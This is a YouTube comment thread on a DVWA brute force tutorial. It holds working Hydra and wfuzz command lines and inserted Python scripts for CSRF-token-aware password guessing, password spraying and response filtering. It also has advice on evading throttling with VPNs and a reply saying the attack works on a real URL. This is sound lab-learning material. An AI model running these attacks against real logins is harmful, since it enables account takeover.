UPDATE: I noticed that a GitHub issue was created, showing how to solve DVWA brute force with Hydra. It turns out the command was OK, but hydra 9.1 (used in the video) had a bug which prevented it from working - github.com/vanhauser-thc/thc-hydra/issues/612
@lextorn92
1 year ago
I was struggling with hydra also. In the newest hydra I got slightly different behavior (error message) but I found the problem. I tried with version 9.1 that you used as well, and I think it's the same problem. The parameter that distinguishes successful attempts from failures MUST be last in the command line, so this works even with hydra 9.1:
./hydra -l admin -P SecLists/Passwords/500-worst-passwords.txt 172.17.0.2 "http-get-form" "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=qvthc81qv13c9eq5vl2nd8oif7; security=low:incorrect" -I
It is really confusing, and the information about this is not clear at all. In the latest hydra you can find a note in the source code: hydra-http-form.c.
@timholtz5590
2 years ago
Thank you for leaving in the try and fail section! Oftentimes the most important thing for a beginner is to learn the thought process. Great tutorial
@_CryptoCat
2 years ago
Thanks mate 🥰 I was tempted to take it out to reduce the total video time. Good to hear it can provide some benefit 😊
@morningwood3938
2 years ago
This.
@tapankamath
2 years ago
That Hydra issue had me on the ropes! Thanks for showcasing it so thoroughly m8! And especially for not cutting the errors you made, got to learn quite a bit through those! Amazing vid!!
@_CryptoCat
2 years ago
Thanks mate! 🥰 Glad I didn't cut the struggle now, as a few people have said it helped 😅
@wisdomovermoney3394
2 years ago
It's a progression.
@manitouphon7618
2 years ago
Thanks a lot for the hydra part, m8. I was literally pulling my hair out until I watched this video and realized that hydra has a bug...
@Hardikpatel-or2mc
3 years ago
Nice tutorial and that wasn't a waste of time (interesting behind the scenes 😜). Keep up the good work mate!
@cybershorts7486
2 years ago
Subscribed! Amazing work bro, can't wait to finish this series!
@_CryptoCat
2 years ago
Awesome! Thanks mate 😊
@janwrona9539
1 year ago
Love the sarcasm in your voice about "just use Burp instead of Hydra" :D
@_CryptoCat
1 year ago
Haha xD I've only used hydra a handful of times since making this video. Mostly use gobuster and ffuf for web, and crackmapexec where possible for other protocols.
@zenoweed
3 years ago
I loved this. So many mistakes to learn from too. We are in this together :))))))
@_CryptoCat
3 years ago
Thanks mate 🥰
@ParitaPatel-i8n
1 year ago
Thank you for the video. I was able to resolve the setup issue.
@hasnainmalik8982
1 year ago
Bro I faced the same problem.. but thanks for sharing your errors too.. I became your subscriber because of this video ❤
@_CryptoCat
1 year ago
Awww thanks mate! Welcome 🥰
@mariyasaify4326
16 days ago
For the CSRF token one, mine is not working, the password shows as incorrect
@CypherX-Sec
5 months ago
Thanks bro, love from India
@wuyaxu8529
3 months ago
Hey, very great video. On the issue of Hydra, maybe adding "F=Username and/or password incorrect.:" could solve the problem? I can perfectly bruteforce the password using hydra.
@bharathnaidu107
2 years ago
A user_token was being generated each time we sent a request. Can you please tell me more about that? Was the user_token being generated on the client side? Thanks for the knowledge you are sharing ❤️.
@_CryptoCat
2 years ago
Think I spoke to you on LinkedIn already but just going to reply here in case others are interested; it's been a while since I looked at DVWA but assuming it was a CSRF token that was generated server side. I did a video on DVWA CSRF but it is TERRIBLE lol 😆 it was towards the end of this video series (which I recorded over a weekend with no prep). I would recommend checking out portswigger.net/web-security/csrf/tokens to learn more about CSRF. The PortSwigger material and labs are excellent in general and provide a lot more to learn than DVWA. Great thing to move onto after DVWA to solidify your understanding and learn more advanced techniques 😉
@ninjanape
1 year ago
Thank you very much! Big help :D
@_CryptoCat
1 year ago
🙏🥰
@georgiana5937
6 months ago
I seem to not have permission to the hackable/users folder. I get a 403 Forbidden error in the browser when accessing that resource. Do you have any idea how to fix it?
@_CryptoCat
6 months ago
Hey, check some of the issues/docs on their github: github.com/digininja/DVWA/issues/149
@anirudhsaxena9214
1 year ago
From where can we access that password list?
@_CryptoCat
1 year ago
Kali Linux and Parrot OS should have some included e.g. rockyou in /usr/share/wordlists. You can also download some, e.g. from seclists: github.com/danielmiessler/SecLists
@iangraham6730
2 years ago
For some reason, when fuzzing I would get a duplicate of each name with the same password -> " #1bitch " lol. But I still got the proper pwds along with them.. Enjoying the video btw!
@AccessWorld-y3p
1 year ago
Good information
@_CryptoCat
1 year ago
🙏🥰
@SupremeNoble
11 months ago
Hey there! Amazing tutorial so far, I got all the way to the High security level before I got stuck. So I'm doing it on Windows 11, I'm not sure if that's relevant or not. But the first problem I encountered following your tutorial at High level was, when I wanted to start the attack, it would tell me I can't use multiple threads when using recursive grep. Luckily I figured out a fix for that by making a new custom resource pool with only 1 maximum concurrent request. Now it can start attacking but I've run into another problem immediately: my first request, which sends the first password in the file correctly, always sends with a blank user_token value. This results in the subsequent attack requests sending parts of the error message instead of proper values. Any idea what could be the problem?
@_CryptoCat
11 months ago
Hmmm which tool are you using? Maybe try another (hydra, wfuzz, ffuf, burp etc) or even make your own python script!
@NoLaSoulja86
2 months ago
Where are we getting the list of passwords from? Did I miss something?
@_CryptoCat
2 months ago
If you are using Kali or Parrot OS, there are wordlists in /usr/share/wordlists/. You can also install seclists either using "sudo apt-get install seclists" or download via GitHub: github.com/danielmiessler/SecLists
@srns25
2 years ago
I tried using a password list and started the attack. But the length is not varying, it is 300 for all the passwords. All my configurations are right, is there anything I can do to fix this?
@_CryptoCat
2 years ago
What tool are you using? Been a while since I did this but maybe try and filter by regex instead of length, e.g. hide responses that contain the word "incorrect". If you are using wfuzz, you could also try to filter by number of chars, instead of number of lines/words 😉
@srns25
2 years ago
Thanks for your response. I just realized that I had the DVWA set to high security level and that was the reason it didn't work. Your videos are extremely gooddd. I'm trying to use hydra as well but I'm getting a parsing error because of using '&'. I haven't tried to fix it yet though.
@_CryptoCat
2 years ago
@srns25 No problem! Best of luck with the remaining levels 😉 If you don't get hydra working you can DM me on Twitter and I'll try to help 🙂
@PastEventsTV
2 years ago
Hi, how can I use this on an actual URL?
@_CryptoCat
2 years ago
Well it depends on the URL, this is an intentionally vulnerable web application so there are minimal security protections (throttling/CSRF etc). If the URL you want to test is also missing security protections, then a similar attack would work, i.e. just swap the URL for the one you are targeting 😀
@PastEventsTV
2 years ago
Thanks.. let's assume I have a URL, so where should I swap it? I didn't get it bro
@_CryptoCat
2 years ago
@PastEventsTV You would replace the URL I use in the video with the URL you are targeting 😆 If you don't understand where the URL goes, plz rewatch the video 😉
@PastEventsTV
2 years ago
@_CryptoCat Gotcha man! Thanks
@ikhsansdq
8 months ago
Hi, great video btw. Just wondering, how do we even know which combination of username and password to use in the medium setting with throttling?
@_CryptoCat
8 months ago
Thanks! It's been a long time since I made these but I think some usernames were provided, either in this lab or one of the others (e.g. SQL injection). For passwords I'd just use a common list.
@ikhsansdq
8 months ago
@_CryptoCat Just figured it out several hours ago. Your tutorial is actually very helpful for me to do ethical hacking. Thank you, appreciate it bro
@_CryptoCat
8 months ago
@ikhsansdq Awesome! No problem mate 👊
@TVVDINAKARAN
3 years ago
Whenever I try to do wfuzz it shows me this error: "UserWarning:Fatal exception: Error opening file. [Errno 2] No such file or directory:". I have got the wordlist file on the Desktop and execute the wfuzz command from the Desktop only, but it still shows me an error. Please help
@_CryptoCat
3 years ago
Hey, make sure you're providing the '-w' flag before the wordlist. If you try to print the wordlist out from the terminal (same directory/filename), does it work?
@TVVDINAKARAN
3 years ago
@_CryptoCat No it doesn't work, I tried it, and there is also an error known as pycurl3
@_CryptoCat
3 years ago
@TVVDINAKARAN I get that pycurl SSL error as well, don't worry about that. Try and re-order your command as well, make sure the URL is the last parameter provided. Also, I played around with wfuzz and ffuf recently and I would personally recommend using ffuf instead of wfuzz 😉 - kzitem.info/news/bejne/r2eM26aGj2KkY6Q
@TVVDINAKARAN
3 years ago
@_CryptoCat Thanks mate, I will look into it
@jokubassodaitis4162
3 years ago
Very nice and informative video! Can you help me with the wordlist? I can't find one.
@_CryptoCat
3 years ago
Thanks mate! rockyou.txt should come with Kali/Parrot (/usr/share/wordlists) and I would also recommend seclists (sudo apt-get or GitHub: github.com/danielmiessler/SecLists). Aside from that I use the crackstation/haveibeenpwned wordlists, you can find them on the websites / Google 😉
@jokubassodaitis4162
3 years ago
Thank youuuu!!!
@stingray3565
2 years ago
With a different seclists wordlist, wfuzz gives a lot of false positives. Have you come across this issue?
@_CryptoCat
2 years ago
Which ones are coming up as false positives? Starting with a # maybe?
@stingray3565
2 years ago
@_CryptoCat Sorry, been away for about 2 weeks, and I don't recollect which ones they were.
@wisdomovermoney3394
2 years ago
So what was the problem with brute force through hydra? Is it a bug in the tool, or a command misconfiguration?
@_CryptoCat
2 years ago
I think it was due to a bug with the hydra version, which kali (and probably parrot) haven't updated still. There's some GitHub issues about it: github.com/vanhauser-thc/thc-hydra/issues/612
@wisdomovermoney3394
2 years ago
I got the same problem with a WordPress login attack. The problem got solved when I placed part of the error message instead of the full one. I am about to try hydra on the dvwa on the brute force challenge, but according to the article shared by you, my version of hydra (9.1) has a bug and does not work. Time to check.
@wisdomovermoney3394
2 years ago
Using hydra 9.1 on Ubuntu failed. The hydra 9.2 worked, but only when using the success message, instead of the error one. So the full working command is: sudo hydra -l admin -p password 'http-get-form://127.0.0.1/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie:welcomebanner_status=dismiss; cookieconsent_status=dismiss; language=en; continueCode=mJBpEKkqbOJZnP15M3Legajov80bmTEirnG2YWDymNRV4xwz6pXlQ9Br7WDO; PHPSESSID=osb4ad9nogmtk8t6r4ugahg2qt; security=low'
@KK-yv4ku
1 year ago
First of all I must say that I really love your videos! You are the best! About the hydra topic, I was able to harvest all credentials with this: hydra localhost http-form-get "/dvwa/vulnerabilities/brute:username=^USER^&password=^PASS^&Login=submit:H=Cookie:security=low; PHPSESSID=i0n9avk1tr136munuo7vuac6kp:F=Username and/or password incorrect." -L /home/kenny/users.txt -P /usr/share/wordlists/rockyou.txt, users.txt being the ones harvested before and the PHPSESSID mine. Got the 5 of them really quick. Thanks, love you bro.
@_CryptoCat
1 year ago
Awww thank you! Great job 👏
@omarataallah9451
3 years ago
Is it worthwhile if you have to brute force a login form but it includes a captcha 🙂?
@_CryptoCat
3 years ago
Depends on the captcha tech, but unless it's really basic, e.g. provide the answer to a basic math equation, it would be a challenge. If the captcha is using image recognition you'd need to integrate some machine learning based solution into your brute force script 😆 There's probably some tools out there to integrate though 😉
@alirezafathi8178
2 years ago
Great video. How can we implement the CSRF token part without using Burp?
@_CryptoCat
2 years ago
My preferred option would probably be a python script using BeautifulSoup e.g. stackoverflow.com/a/28292151
@EdwinDeJesus-w6i
11 months ago
@_CryptoCat Do you run this script in Kali Python?
@_CryptoCat
11 months ago
@EdwinDeJesus-w6i I'm using Parrot OS, but yeh, Kali should be fine too ☺
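The Python approach suggested above (fetch the page, pull out the user_token, send it with each guess, and read the next token from the response), as an added example: this is not code from the video, from DVWA or from the linked BeautifulSoup answer, and it uses only the standard library. The `user_token` hidden field, the "Username and/or password incorrect." and "Welcome to the password protected area" strings, the GET parameters and the /vulnerabilities/brute/ path are taken from DVWA's brute force page and are assumptions here; `HttpDvwa` and `FakeDvwa` are names made up for this example, and `FakeDvwa` is a constructed stand-in so the script runs offline.

```python
"""Token-aware brute force of a login form that issues a fresh CSRF token with
every response (DVWA's "high" brute force level). Added example, standard
library only; FakeDvwa is a constructed stand-in for offline runs."""
import re
import secrets
import time
import urllib.parse
import urllib.request

# Assumed page details, lifted from DVWA's brute force form.
TOKEN_RE = re.compile(r"name=['\"]user_token['\"]\s+value=['\"]([0-9a-fA-F]+)['\"]")
FAIL_MARKER = "Username and/or password incorrect."
SUCCESS_MARKER = "Welcome to the password protected area"


def extract_user_token(html):
    """Return the hidden CSRF token from the page, or None if there is none."""
    m = TOKEN_RE.search(html)
    return m.group(1) if m else None


def classify(html):
    """'success', 'fail', or 'unknown' (CSRF error, throttle page, anything unexpected)."""
    if SUCCESS_MARKER in html:
        return "success"
    if FAIL_MARKER in html:
        return "fail"
    return "unknown"


def brute_force(client, username, passwords, delay=0.0):
    """Try each password, always sending the token issued by the previous response.
    Returns (password, attempts) on success or (None, attempts) when exhausted."""
    token = extract_user_token(client.get())
    attempts = 0
    for pw in passwords:
        if token is None:
            raise RuntimeError("no user_token in page; stale session or wrong security level?")
        html = client.login(username, pw, token)
        attempts += 1
        verdict = classify(html)
        if verdict == "success":
            return pw, attempts
        if verdict == "unknown":
            # Stop instead of burning guesses: once a token is rejected, every
            # later guess built from that response fails the same way (the
            # blank-token symptom described in the thread).
            raise RuntimeError(f"unexpected response after {attempts} attempts")
        token = extract_user_token(html)  # each failure page carries a fresh token
        if delay:
            time.sleep(delay)
    return None, attempts


class HttpDvwa:
    """Real transport (not exercised offline): GET via urllib with your own PHPSESSID."""

    def __init__(self, base_url, phpsessid, security="high"):
        self.url = base_url.rstrip("/") + "/vulnerabilities/brute/"
        self.cookie = f"PHPSESSID={phpsessid}; security={security}"

    def _fetch(self, url):
        req = urllib.request.Request(url, headers={"Cookie": self.cookie})
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")

    def get(self):
        return self._fetch(self.url)

    def login(self, username, password, token):
        query = urllib.parse.urlencode({"username": username, "password": password,
                                        "Login": "Login", "user_token": token})
        return self._fetch(self.url + "?" + query)


class FakeDvwa:
    """Constructed stand-in: one valid credential, a new token on every page,
    and a check that rejects anything but the most recently issued token."""

    def __init__(self, username="admin", password="password"):
        self._creds = (username, password)
        self._token = None
        self.requests = 0

    def _page(self, message=""):
        self._token = secrets.token_hex(16)
        return (f"<p>{message}</p><form><input type='hidden' name='user_token' "
                f"value='{self._token}' /></form>")

    def get(self):
        self.requests += 1
        return self._page()

    def login(self, username, password, token):
        self.requests += 1
        if token != self._token:
            return "<p>CSRF token is incorrect</p>"  # no new token: caller must re-GET
        if (username, password) == self._creds:
            return self._page(SUCCESS_MARKER + " " + username)
        return self._page(FAIL_MARKER)


if __name__ == "__main__":
    lab = FakeDvwa()  # swap for HttpDvwa("http://127.0.0.1", "<your PHPSESSID>") on a real lab
    print(brute_force(lab, "admin", ["123456", "letmein", "password", "qwerty"]))
```

The loop costs one request per guess because the failure page already contains the next token; only a rejected token (the "unknown" verdict) forces a fresh GET, which is why the script stops there instead of continuing blindly.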
@noyaljose2745
2 years ago
Let's say the password of the site was in the 30000th position and we're throttled to 2 sec between trying new passwords. In that case it'd take 10+ hours for us to get the password. Is there any way to overcome this? I felt everyone's approach on the medium difficulty was flawed.
@_CryptoCat
2 years ago
Good question! A few thoughts:
- ensure the password list is ordered according to the most commonly found passwords
- if the website has a password policy, you can filter out invalid passwords from the wordlist
- if the throttling is IP based, you could use VPNs and distribute the attack
- if the throttling is user account based, you can distribute the attack across usernames
TLDR; depends on the password list and the throttling implementation, but sometimes it will just take a really long time, other times you won't crack it at all.
@noyaljose2745
2 years ago
@_CryptoCat I didn't expect such a fast reply. Thanks a lot for all these suggestions
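The three list-side tactics from the reply above (keep the frequency order, drop candidates the password policy would never have accepted, spread guesses across accounts when the throttle is per account) as an added example, not code from the video. The policy rules, the delay figures and the throttle models are assumptions; the wordlist is a constructed sample, not rockyou, and the usernames are DVWA's default accounts.

```python
"""Shrinking and scheduling a throttled brute force. Added example; the policy
and the throttle models are assumptions, the wordlist is constructed."""
import re


def fits_policy(pw, min_len=8, need_digit=True, need_upper=False):
    """A hypothetical target policy: candidates that could never have been set are wasted guesses."""
    if len(pw) < min_len:
        return False
    if need_digit and not re.search(r"\d", pw):
        return False
    if need_upper and not re.search(r"[A-Z]", pw):
        return False
    return True


def prune(wordlist, **policy):
    """Drop policy-violating and duplicate candidates, keeping first-seen order so a
    frequency-sorted list still puts the most likely passwords first."""
    seen, out = set(), []
    for pw in wordlist:
        if pw not in seen and fits_policy(pw, **policy):
            seen.add(pw)
            out.append(pw)
    return out


def spray_schedule(users, passwords):
    """Password-first ordering: every account gets one guess per round, so a
    per-account delay (or lockout counter) is spread over all accounts instead
    of hammering a single one."""
    return [(u, p) for p in passwords for u in users]


def estimate_seconds(n_passwords, n_users, delay, throttle="account", egress_ips=1):
    """Wall-clock for the full run under the two throttle models discussed above."""
    total = n_passwords * n_users
    if throttle == "ip":
        return total * delay / egress_ips   # one clock per source IP; VPNs add clocks
    if throttle == "account":
        return n_passwords * delay          # accounts are independent, rounds are serial
    raise ValueError(f"unknown throttle model: {throttle}")


if __name__ == "__main__":
    # constructed sample wordlist, roughly in "most common first" order
    sample = ["123456", "password", "Password1", "letmein", "Password1", "qwerty123", "iloveyou"]
    candidates = prune(sample, min_len=8, need_digit=True)
    users = ["admin", "gordonb", "1337", "pablo", "smithy"]   # DVWA's default accounts
    print(candidates)
    print(spray_schedule(users, candidates)[:5])
    print(estimate_seconds(30000, 1, 2, "ip") / 3600, "hours, single account, one IP")
    print(estimate_seconds(30000, len(users), 2, "account") / 3600, "hours across all accounts")
```

The estimate for the question above (30000th password, 2 s throttle) comes out at 60000 s, roughly 16.7 hours; note that under a per-account throttle spraying five accounts costs the same wall-clock as one, whereas under an IP throttle it costs five times as much unless you also add egress IPs.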
@iankimca
2 years ago
For wfuzz, I couldn't get my cookie to filter out the 200 response. My PHPSESSID is different from yours
@_CryptoCat
2 years ago
PHPSESSID should be different each time, try to insert yours in wfuzz 😉
@iankimca
2 years ago
@_CryptoCat I did and it printed out some 3 thousand values. How do I filter out the 200 responses?
@_CryptoCat
2 years ago
@iankimca -hc 200 will Hide Code 200. You can also use -hl, -hw, -hh to hide lines/words/chars (response size) 😉
@iankimca
2 years ago
@_CryptoCat Ok, I used --hc 302 to hide failures but it printed out hundreds of other responses. I used -sw 248 like in the video to show successes but nothing prints out for me. I think my successful words are different from 248. Any thoughts on how I should proceed?
@_CryptoCat
2 years ago
@iankimca Hi mate, unless you *know* the correct number of words for a successful login is 248, I would use "hide words" (hw) instead of "show words" (sw), e.g. if an incorrect login is 420 words, use -hw 420.
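The size-based filtering behind wfuzz's -hc/-hl/-hw/-hh and -sw flags, and the "hide what failure looks like rather than guess what success looks like" advice above, as an added example: this is not code from the video or from wfuzz. The two page bodies are constructed to resemble DVWA's brute force page after a failed and a successful login; their word counts are whatever that constructed markup yields, not the 248 from the video.

```python
"""Response filtering by status code and size, as wfuzz's hide/show flags do it.
Added example; the page bodies are constructed, not captured from DVWA."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Response:
    payload: str   # the candidate password that produced this response
    status: int
    body: str

    # The three size measures wfuzz reports per response.
    @property
    def lines(self):
        return self.body.count("\n")

    @property
    def words(self):
        return len(re.findall(r"\S+", self.body))

    @property
    def chars(self):
        return len(self.body)


def filter_responses(responses, hide_code=(), hide_lines=(), hide_words=(),
                     hide_chars=(), show_words=None):
    """Drop responses matching any hide filter; with show_words set, keep only that count."""
    kept = []
    for r in responses:
        if (r.status in hide_code or r.lines in hide_lines
                or r.words in hide_words or r.chars in hide_chars):
            continue
        if show_words is not None and r.words != show_words:
            continue
        kept.append(r)
    return kept


def baseline_filters(failed_attempt):
    """Hide filters derived from one deliberately wrong login. The status code is
    deliberately not used: DVWA answers 200 for both outcomes, so -hc 200 would
    hide the success as well."""
    return {"hide_words": {failed_attempt.words}, "hide_chars": {failed_attempt.chars}}


def _page(message):
    # constructed DVWA-like markup; the only thing that differs between outcomes is `message`
    return ("<html><body>\n<div class='body_padded'>\n<h1>Vulnerability: Brute Force</h1>\n"
            "<form action='#' method='GET'>\nUsername: <input type='text' name='username'>\n"
            "Password: <input type='password' name='password'>\n"
            "<input type='submit' value='Login' name='Login'>\n"
            f"</form>\n{message}\n</div>\n</body></html>\n")


FAIL_PAGE = _page("<pre><br />Username and/or password incorrect.</pre>")
SUCCESS_PAGE = _page("<p>Welcome to the password protected area admin</p>"
                     "<img src='hackable/users/admin.jpg' />")


def run_demo():
    """Probe once with a known-bad password, then hide everything that looks like it."""
    wordlist = ["123456", "12345", "password", "qwerty"]   # constructed mini wordlist
    responses = [Response(pw, 200, SUCCESS_PAGE if pw == "password" else FAIL_PAGE)
                 for pw in wordlist]
    probe = Response("definitely-not-the-password", 200, FAIL_PAGE)
    hits = filter_responses(responses, **baseline_filters(probe))
    return [r.payload for r in hits]


if __name__ == "__main__":
    print(run_demo())
```

Guessing a success size (-sw 248) filters everything out when your page renders differently from the video's, while hiding the failure baseline keeps exactly the one response that differs, which is the behaviour the reply above recommends.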
@sherman8r1998
3 years ago
I can't get hydra cracking DVWA either. Looked at countless tutorial vids, so annoying lol
@_CryptoCat
3 years ago
Yeh, this was so frustrating! I've boycotted hydra ever since this video 😅
@jonasverkaap4054
1 year ago
Hello, I'm a Windows user and I want to know if I can get wfuzz on my Windows system and how. Do you know how it works?
@_CryptoCat
1 year ago
wfuzz is python-based so if you install python, you could use wfuzz on windows. Check this: wfuzz.readthedocs.io/en/latest/user/installation.html#pycurl-on-windows
@jonasverkaap4054
1 year ago
@_CryptoCat Thanks!
@MM-sl1nq
1 year ago
You only needed to make DVWA in the URL capital letters and it should work
@_CryptoCat
1 year ago
🤔
@unknownuser7776
1 year ago
Can you solve impossible?
@_CryptoCat
1 year ago
You shouldn't be able to solve it 😁 If you find a way you can report to the creator 😉
@StephenMolloyGoogle
3 years ago
Could the security=high be done using wfuzz?
@_CryptoCat
3 years ago
Not that I'm aware of! I don't think you'll be able to grab the CSRF token with wfuzz.
@StephenMolloyGoogle
3 years ago
@_CryptoCat Probably. I might try a Python script. Just to avoid Burp Suite 😊
@_CryptoCat
3 years ago
@StephenMolloyGoogle Probably the best bet unless you have Burp Suite Pro.. the throttling on Intruder can be a real nightmare so I would recommend a custom script normally (assuming ffuf can't do the job), also a good opportunity to build coding skills 😀
@morningwood3938
2 years ago
Man, I love your videos. I just wish you did not smack your lips all the time like that, loool!!! :D
@_CryptoCat
2 years ago
Yeh haha, I'm sorry bro! It took me a while but I think I'm getting there, same with the microphone static/pops. Some of the video/audio quality in my earlier videos is super cringe xD
@ijayilumumba6012
3 years ago
For this, must I use Linux?
@_CryptoCat
3 years ago
It will be possible without it but Linux will be easiest for installing/configuring DVWA and all the relevant tools. Something like Kali Linux / Parrot OS will be ideal!
@ijayilumumba6012
3 years ago
@_CryptoCat Thank you!
@luizlucioandrade
1 year ago
I couldn't find the address of this site, could you put the site's http link?
@_CryptoCat
1 year ago
Thanks for reminding me, the address currently in the description was bought by scammers :( I'll update it now with the official GitHub repository: github.com/digininja/DVWA
@JohnSmith-wp6xm
2 years ago
I tried exactly what you did but put http-get-form and it worked for me
@_CryptoCat
2 years ago
Nicely done!
@Daftronic
1 year ago
Hydra is really shitty, it never finds the password in multiple different scenarios with all the syntax correct, unlike Burp which finds it every time.
@_CryptoCat
1 year ago
Yeh, I rarely ever use hydra these days! ffuf for web stuff (burp is great, but slow if you don't have pro version) and crackmapexec for most other protocols 🙂
@gurusarena1185
3 years ago
How can I connect with you bro?
@_CryptoCat
3 years ago
Hey, I have some social media links listed on the main channel 😀
@gurusarena1185
3 years ago
@_CryptoCat Okay, thanks
@gurusarena1185
3 years ago
@_CryptoCat I have sent you a message on Twitter, and also connected with you on LinkedIn
@allenpreece
2 months ago
Dude! Keep it simple. You're picking things to show at random without even showing the password attack complete. Relax man. Start showing us something and follow through with it instead of running to something else.
@phuc_cuhp
1 year ago
Dude, for the Low level, you should have used "Cookie\:" instead of "Cookie:"
@mitulshah5594
3 years ago
Bro, you don't use Insta?
@_CryptoCat
3 years ago
Instagram? Not for cybersecurity related stuff 😆 Mostly just YouTube + Twitter, a little bit of Reddit 😀
@Solomonrajvallepu
2 years ago
Frustrating listening to your voice in a headset; for each word you say, you are taking down your saliva with that word.
@_CryptoCat
2 years ago
Yeh, I'm sorry bro, these early videos were put together with little preparation or editing - basically an upload of me livestreaming the challenges. I'm actually surprised these videos get so many views considering the audio quality, small fonts etc. I've got better at making (and editing) videos now so if you check some of my recent uploads hopefully you will notice a big difference. Maybe I will go back one day and re-record the DVWA series as it is quite popular, but atm I don't have the time unfortunately. Apologies! 💜
@ReturnTypeVoid
2 years ago
@_CryptoCat There is nothing wrong with the sound in the video and there is absolutely no need to re-record. A simple thank you for your time and effort is what I think he was supposed to say. In the words of Alfred Pennyworth, "Some men aren't looking for anything logical, like money. They can't be bought, bullied, reasoned, or negotiated with; some men just want to watch the world burn."
@_CryptoCat
2 years ago
@ReturnTypeVoid Thanks mate 🥰 The audio is definitely a bit hit and miss compared to my recent videos but you're right, I take the time to make and publish these videos for free in case they can help others.. If it doesn't, or the quality isn't good enough.. just don't watch it 😂
@ifrit4449
2 years ago
I gotta dislike, my dude
@_CryptoCat
2 years ago
Well thanks for letting me know! Any feedback on why you dislike?
@DAILYHIJACKS
3 years ago
GREAT EXPLANATION FOR NEWBIES.... I WONDER WHY YOU ARE STILL NOT FAMOUS!!!! LET'S CONNECT ON SOCIAL MEDIA
@chirpieful
3 years ago
Seems like hydra can only work on the /dvwa/login.php
@LucassenR
2 years ago
This might be a late reaction, but you need Hydra version 9.2 or higher for this to work.
@chirpieful
2 years ago
@LucassenR Thanks for the info!
@rammyfzl
3 years ago
You needed to add ':F=' (for failure, I presume) after the form data and before the failure message. So it would look similar to this:
hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=admin&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=[YOUR PHPSESSID]; security=low" -V
See example pasteboard.co/K1omrQY.png
@_CryptoCat
3 years ago
Hmmm, that's interesting and cool you got it working! 😎 When I made this video I hadn't used hydra in a couple of years (since OSCP) but none of the commands in my notes specify the ":F" part, they just look like: '...http-post-form "/login:username=^USER^&password=^PASS^&submit=Login:Login failed' and always worked without issues. Looking at the hydra documentation now, the only thing I can see about the "F" option is that it will end the fuzzing once it finds a correct password. That being said, I can't find any GitHub code for hydra, is the project even active anymore? 🤔
@rammyfzl
3 years ago
@_CryptoCat I believe you're right, my notes do not mention the 'F' option either. If I figure out that mystery I'll be sure to share. The GitHub project can be found here: github.com/vanhauser-thc/thc-hydra
@_CryptoCat
3 years ago
Ooo ok, yeh, so looking at the code comments it should use the failure message by default if you don't specify F or S - "By default, if no header is found the condition is assume to be a fail" - github.com/vanhauser-thc/thc-hydra/blob/master/hydra-http.c. Looking elsewhere on the GitHub it seems the original issue was addressed: github.com/vanhauser-thc/thc-hydra/issues/612
Comments: 138